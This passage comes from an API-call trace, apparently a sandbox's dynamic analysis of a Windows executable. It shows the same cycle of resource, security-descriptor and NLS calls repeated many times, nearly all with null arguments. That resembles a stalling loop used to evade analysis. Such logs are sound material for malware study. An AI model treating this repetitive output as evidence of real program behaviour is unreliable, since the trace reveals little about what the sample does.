lpdwRevision=0x209de4c) returned 0 [0220.091] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.091] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.091] LockResource (hResData=0x0) returned 0x0 [0220.091] FreeResource (hResData=0x0) returned 0 [0220.091] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.091] LockResource (hResData=0x0) returned 0x0 [0220.091] FreeResource (hResData=0x0) returned 0 [0220.091] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.091] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.091] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.091] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.091] LockResource (hResData=0x0) returned 0x0 [0220.091] FreeResource (hResData=0x0) returned 0 [0220.091] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.091] LockResource (hResData=0x0) returned 0x0 [0220.091] FreeResource (hResData=0x0) returned 0 [0220.091] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.091] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.091] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.091] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.091] LockResource (hResData=0x0) returned 0x0 [0220.091] FreeResource (hResData=0x0) returned 0 [0220.091] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.091] LockResource (hResData=0x0) returned 0x0 [0220.091] FreeResource (hResData=0x0) returned 0 [0220.091] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.091] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.091] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.091] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.091] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.092] LockResource (hResData=0x0) returned 0x0 [0220.092] FreeResource (hResData=0x0) returned 0 [0220.092] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.092] LockResource (hResData=0x0) returned 0x0 [0220.092] FreeResource (hResData=0x0) returned 0 [0220.092] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.092] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.092] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.092] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.092] LockResource (hResData=0x0) returned 0x0 [0220.092] FreeResource (hResData=0x0) returned 0 [0220.092] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.092] LockResource (hResData=0x0) returned 0x0 [0220.092] FreeResource (hResData=0x0) returned 0 [0220.092] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.092] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.092] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.092] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.092] LockResource (hResData=0x0) returned 0x0 [0220.092] FreeResource (hResData=0x0) returned 0 [0220.092] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.092] LockResource (hResData=0x0) returned 0x0 [0220.092] FreeResource (hResData=0x0) returned 0 [0220.092] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.092] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.092] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.092] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.092] LockResource (hResData=0x0) returned 0x0 [0220.092] FreeResource (hResData=0x0) returned 0 [0220.092] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.092] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.092] LockResource (hResData=0x0) returned 0x0 [0220.092] FreeResource (hResData=0x0) returned 0 [0220.092] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.092] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.092] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.093] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.093] LockResource (hResData=0x0) returned 0x0 [0220.093] FreeResource (hResData=0x0) returned 0 [0220.093] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.093] LockResource (hResData=0x0) returned 0x0 [0220.093] FreeResource (hResData=0x0) returned 0 [0220.093] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.093] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.093] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.093] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.093] LockResource (hResData=0x0) returned 0x0 [0220.093] FreeResource (hResData=0x0) returned 0 [0220.093] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.093] LockResource (hResData=0x0) returned 0x0 [0220.093] FreeResource (hResData=0x0) returned 0 [0220.093] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.093] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.093] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.093] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.093] LockResource (hResData=0x0) returned 0x0 [0220.093] FreeResource (hResData=0x0) returned 0 [0220.093] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.093] LockResource (hResData=0x0) returned 0x0 [0220.093] FreeResource (hResData=0x0) returned 0 [0220.093] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.093] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.093] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.093] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.093] LockResource (hResData=0x0) returned 0x0 [0220.093] FreeResource (hResData=0x0) returned 0 [0220.093] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.093] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.093] LockResource (hResData=0x0) returned 0x0 [0220.093] FreeResource (hResData=0x0) returned 0 [0220.093] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.093] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.094] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.094] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.094] LockResource (hResData=0x0) returned 0x0 [0220.094] FreeResource (hResData=0x0) returned 0 [0220.094] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.094] LockResource (hResData=0x0) returned 0x0 [0220.094] FreeResource (hResData=0x0) returned 0 [0220.094] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.094] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.094] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.094] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.094] LockResource (hResData=0x0) returned 0x0 [0220.094] FreeResource (hResData=0x0) returned 0 [0220.094] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.094] LockResource (hResData=0x0) returned 0x0 [0220.094] FreeResource (hResData=0x0) returned 0 [0220.094] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.094] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.094] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.094] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.094] LockResource (hResData=0x0) returned 0x0 [0220.094] FreeResource (hResData=0x0) returned 0 [0220.094] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.094] LockResource (hResData=0x0) returned 0x0 [0220.094] FreeResource (hResData=0x0) returned 0 [0220.094] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.094] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.094] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.094] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.094] LockResource (hResData=0x0) returned 0x0 [0220.094] FreeResource (hResData=0x0) returned 0 [0220.094] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.094] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.094] LockResource (hResData=0x0) returned 0x0 [0220.094] FreeResource (hResData=0x0) returned 0 [0220.094] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.095] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.095] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.095] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.095] LockResource (hResData=0x0) returned 0x0 [0220.095] FreeResource (hResData=0x0) returned 0 [0220.095] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.095] LockResource (hResData=0x0) returned 0x0 [0220.095] FreeResource (hResData=0x0) returned 0 [0220.095] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.095] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.095] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.095] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.095] LockResource (hResData=0x0) returned 0x0 [0220.095] FreeResource (hResData=0x0) returned 0 [0220.095] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.095] LockResource (hResData=0x0) returned 0x0 [0220.095] FreeResource (hResData=0x0) returned 0 [0220.095] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.095] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.095] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.095] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.095] LockResource (hResData=0x0) returned 0x0 [0220.095] FreeResource (hResData=0x0) returned 0 [0220.095] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.095] LockResource (hResData=0x0) returned 0x0 [0220.095] FreeResource (hResData=0x0) returned 0 [0220.095] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.095] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.095] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.095] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.095] LockResource (hResData=0x0) returned 0x0 [0220.095] FreeResource (hResData=0x0) returned 0 [0220.095] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.095] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.095] LockResource (hResData=0x0) returned 0x0 [0220.095] FreeResource (hResData=0x0) returned 0 [0220.096] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.096] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.096] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.096] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.096] LockResource (hResData=0x0) returned 0x0 [0220.096] FreeResource (hResData=0x0) returned 0 [0220.096] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.096] LockResource (hResData=0x0) returned 0x0 [0220.096] FreeResource (hResData=0x0) returned 0 [0220.096] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.096] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.096] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.096] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.096] LockResource (hResData=0x0) returned 0x0 [0220.096] FreeResource (hResData=0x0) returned 0 [0220.096] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.096] LockResource (hResData=0x0) returned 0x0 [0220.096] FreeResource (hResData=0x0) returned 0 [0220.096] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.096] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.096] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.096] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.096] LockResource (hResData=0x0) returned 0x0 [0220.096] FreeResource (hResData=0x0) returned 0 [0220.096] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.096] LockResource (hResData=0x0) returned 0x0 [0220.096] FreeResource (hResData=0x0) returned 0 [0220.096] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.096] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.096] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.096] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.096] LockResource (hResData=0x0) returned 0x0 [0220.096] FreeResource (hResData=0x0) returned 0 [0220.096] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.096] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.096] LockResource (hResData=0x0) returned 0x0 [0220.096] FreeResource (hResData=0x0) returned 0 [0220.097] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.097] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.097] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.097] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.097] LockResource (hResData=0x0) returned 0x0 [0220.097] FreeResource (hResData=0x0) returned 0 [0220.097] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.097] LockResource (hResData=0x0) returned 0x0 [0220.097] FreeResource (hResData=0x0) returned 0 [0220.097] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.097] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.097] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.097] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.097] LockResource (hResData=0x0) returned 0x0 [0220.097] FreeResource (hResData=0x0) returned 0 [0220.097] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.097] LockResource (hResData=0x0) returned 0x0 [0220.097] FreeResource (hResData=0x0) returned 0 [0220.097] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.097] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.097] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.097] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.097] LockResource (hResData=0x0) returned 0x0 [0220.097] FreeResource (hResData=0x0) returned 0 [0220.097] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.097] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.097] LockResource (hResData=0x0) returned 0x0 [0220.097] FreeResource (hResData=0x0) returned 0 [0220.097] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.097] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.097] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.097] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 